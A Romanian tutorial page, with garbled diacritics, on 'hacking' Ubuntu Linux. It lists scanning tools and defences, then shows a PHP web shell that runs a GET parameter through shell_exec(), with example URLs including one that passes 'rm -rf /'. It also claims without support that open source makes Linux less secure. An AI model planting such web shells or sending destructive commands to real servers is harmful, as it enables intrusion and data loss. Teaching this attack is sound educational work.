Hacking Linux OS: Hacking cu Ubuntu (Tutorial de comenzi)

Linux este cel mai utilizat sistem de operare pentru servere, รฎn special pentru serverele web. Este open source; aceasta รฎnseamnฤƒ cฤƒ oricine poate avea acces la codul sursฤƒ. Acest lucru รฎl face mai puศ›in sigur รฎn comparaศ›ie cu alte sisteme de operare, deoarece atacatorii pot studia codul sursฤƒ pentru a gฤƒsi vulnerabilitฤƒศ›i. Linux for Hackers se referฤƒ la exploatarea acestor vulnerabilitฤƒศ›i pentru a obศ›ine acces neautorizat la un sistem.

รŽn acest articol, vฤƒ vom prezenta ce este Linux, vulnerabilitฤƒศ›ile sale de securitate, cu care piratare Ubuntu ศ™i contramฤƒsurile pe care le poศ›i pune รฎn aplicare.

Notฤƒ rapidฤƒ pe Linux

Linux este un sistem de operare open source. Existฤƒ multe distribuศ›ii de sisteme de operare bazate pe Linux, cum ar fi Redhat, Fedora ศ™i Ubuntu, etc. Spre deosebire de alte sisteme de operare, Linux este mai puศ›in sigur cรขnd vine vorba de securitate. Acest lucru se datoreazฤƒ faptului cฤƒ codul sursฤƒ este disponibil gratuit, deci este uศ™or sฤƒ รฎl studiezi pentru vulnerabilitฤƒศ›i ศ™i sฤƒ le exploatezi รฎn comparaศ›ie cu alte sisteme de operare care nu sunt open source. Linux poate fi folosit ca sistem de operare server, desktop, tabletฤƒ sau dispozitiv mobil.

Programele Linux pot fi operate fie folosind GUI, fie comenzi. Comenzile Linux pentru Kali Linux hacking-urile sunt mai eficiente ศ™i mai eficiente รฎn comparaศ›ie cu utilizarea GUI. Din acest motiv, vฤƒ ajutฤƒ sฤƒ cunoaศ™teศ›i comenzile Linux de bazฤƒ pentru hacking.

Consultaศ›i aceste tutoriale https://www.guru99.com/unix-linux-tutorial.html despre cum sฤƒ รฎncepeศ›i Kali Linux hack-uri.

Instrumente de hacking Linux

  • Nessusโ€“ acest instrument poate fi folosit pentru Ubuntu hack, setฤƒri de configurare de scanare, patch-uri ศ™i reศ›ele etc. poate fi gฤƒsit la https://www.tenable.com/products/nessus
  • NMap. Acest instrument poate fi folosit pentru a monitoriza gazdele care ruleazฤƒ pe server ศ™i serviciile pe care le utilizeazฤƒ. Poate fi folosit ศ™i pentru a scana porturi. Poate fi gฤƒsit la https://nmap.org/
  • SARA โ€“ SARA este acronimul pentru Security Auditor's Research Assistant. Dupฤƒ cum sugereazฤƒ ศ™i numele, acest instrument poate fi utilizat pentru a audita reศ›elele รฎmpotriva ameninศ›ฤƒrilor precum Injecศ›ie SQL, XSS etc. poate fi gฤƒsit la http://www-arc.com/sara/sara.html

Lista de mai sus nu este exhaustivฤƒ; vฤƒ oferฤƒ o idee despre instrumentele disponibile pentru Ubuntu piratarea ศ™i piratarea sistemelor Linux.

Cum sฤƒ preveniศ›i hackurile Linux

Linux Hacking profitฤƒ de vulnerabilitฤƒศ›ile din sistemul de operare. O organizaศ›ie poate adopta urmฤƒtoarea politicฤƒ pentru a se proteja รฎmpotriva unor astfel de atacuri.

  • Managementul patch-urilorโ€“ corecศ›iile remediazฤƒ erorile pe care atacatorii le exploateazฤƒ pentru a compromite un sistem. O bunฤƒ politicฤƒ de gestionare a corecศ›iilor vฤƒ va asigura cฤƒ aplicaศ›i รฎn mod constant corecศ›iile relevante sistemului dumneavoastrฤƒ.
  • Configurare corectฤƒ a sistemului de operareโ€“ alte exploit-uri profitฤƒ de punctele slabe din configuraศ›ia serverului. Numele de utilizator ศ™i demonii inactivi ar trebui sฤƒ fie dezactivate. Setฤƒrile implicite, cum ar fi parolele comune pentru aplicaศ›ie, numele de utilizator implicite ศ™i unele numere de porturi ar trebui modificate.
  • Sistem de detectare a intruziunilorโ€“ astfel de instrumente pot fi folosite pentru a detecta accesul neautorizat la sistem. Unele instrumente au capacitatea de a detecta ศ™i de a preveni astfel de atacuri.

Activitate de hacking: Hack a Ubuntu Sistem Linux folosind PHP

รŽn acest scenariu practic, vom รฎnvฤƒศ›a cum sฤƒ piratam Ubuntu ศ™i vฤƒ vom oferi informaศ›ii de bazฤƒ despre cum puteศ›i utiliza PHP pentru a compromite un Linux. Nu vom viza nicio victimฤƒ. Dacฤƒ doriศ›i sฤƒ รฎl รฎncercaศ›i, puteศ›i instala LAMPP pe maศ™ina dvs. localฤƒ.

PHP vine cu douฤƒ funcศ›ii care pot fi folosite pentru a executa comenzi de hacking Linux. Are funcศ›iile exec() ศ™i shell_exec(). Funcศ›ia exec() returneazฤƒ ultima linie a comenzii, รฎn timp ce shell_exec() returneazฤƒ รฎntregul rezultat al comenzii ca ศ™ir.

รŽn scopuri demonstrative, sฤƒ presupunem cฤƒ managerii atacatorilor รฎncarcฤƒ urmฤƒtorul fiศ™ier pe un server web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

AICI,

Scriptul de mai sus primeศ™te comanda de la variabila GET numitฤƒ cmd. Comanda este executatฤƒ folosind shell_exec() ศ™i rezultatele sunt returnate รฎn browser.

Codul de mai sus poate fi exploatat folosind urmฤƒtoarele URL

http://localhost/cp/konsole.php?cmd=ls%20-l

AICI,

  • โ€žโ€ฆkonsole.php?cmd=ls%20-lโ€atribuie valoarea ls โ€“l variabilei cmd.

Comanda รฎn Ubuntu pentru hacking รฎmpotriva serverului va fi executat ca

shell_exec('ls -l') ;

Executarea codului de mai sus pe un server web dฤƒ rezultate similare cu urmฤƒtoarele.

Hack a Ubuntu Sistem Linux folosind PHP

Comanda de mai sus afiศ™eazฤƒ pur ศ™i simplu fiศ™ierele din directorul curent ศ™i permisiunile

Sฤƒ presupunem cฤƒ atacatorul trece urmฤƒtoarea comandฤƒ

rm -rf /

AICI,

  • โ€žrmโ€ eliminฤƒ fiศ™ierele
  • โ€žrfโ€ face ca comanda rm sฤƒ ruleze รฎntr-un mod recursiv. ศ˜tergerea tuturor folderelor ศ™i fiศ™ierelor
  • โ€ž/โ€ indicฤƒ comenzii sฤƒ รฎnceapฤƒ ศ™tergerea fiศ™ierelor din directorul rฤƒdฤƒcinฤƒ

Atacul URL ar arฤƒta cam aศ™a

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Rezumat

  • Linux este un sistem de operare popular pentru servere, desktop-uri, tablete ศ™i dispozitive mobile.
  • Linux este open source, iar codul sursฤƒ poate fi obศ›inut de oricine. Acest lucru faciliteazฤƒ identificarea vulnerabilitฤƒศ›ilor. Este unul dintre cele mai bune sisteme de operare pentru hackeri.
  • Comenzi de hacking de bazฤƒ ศ™i de reศ›ea รฎn Ubuntu sunt valoroase pentru hackerii Linux.
  • Vulnerabilitฤƒศ›ile sunt o slฤƒbiciune care poate fi exploatatฤƒ pentru a compromite un sistem.
  • O bunฤƒ securitate poate ajuta la protejarea unui sistem de a fi compromis de un atacator.

Rezumaศ›i aceastฤƒ postare cu: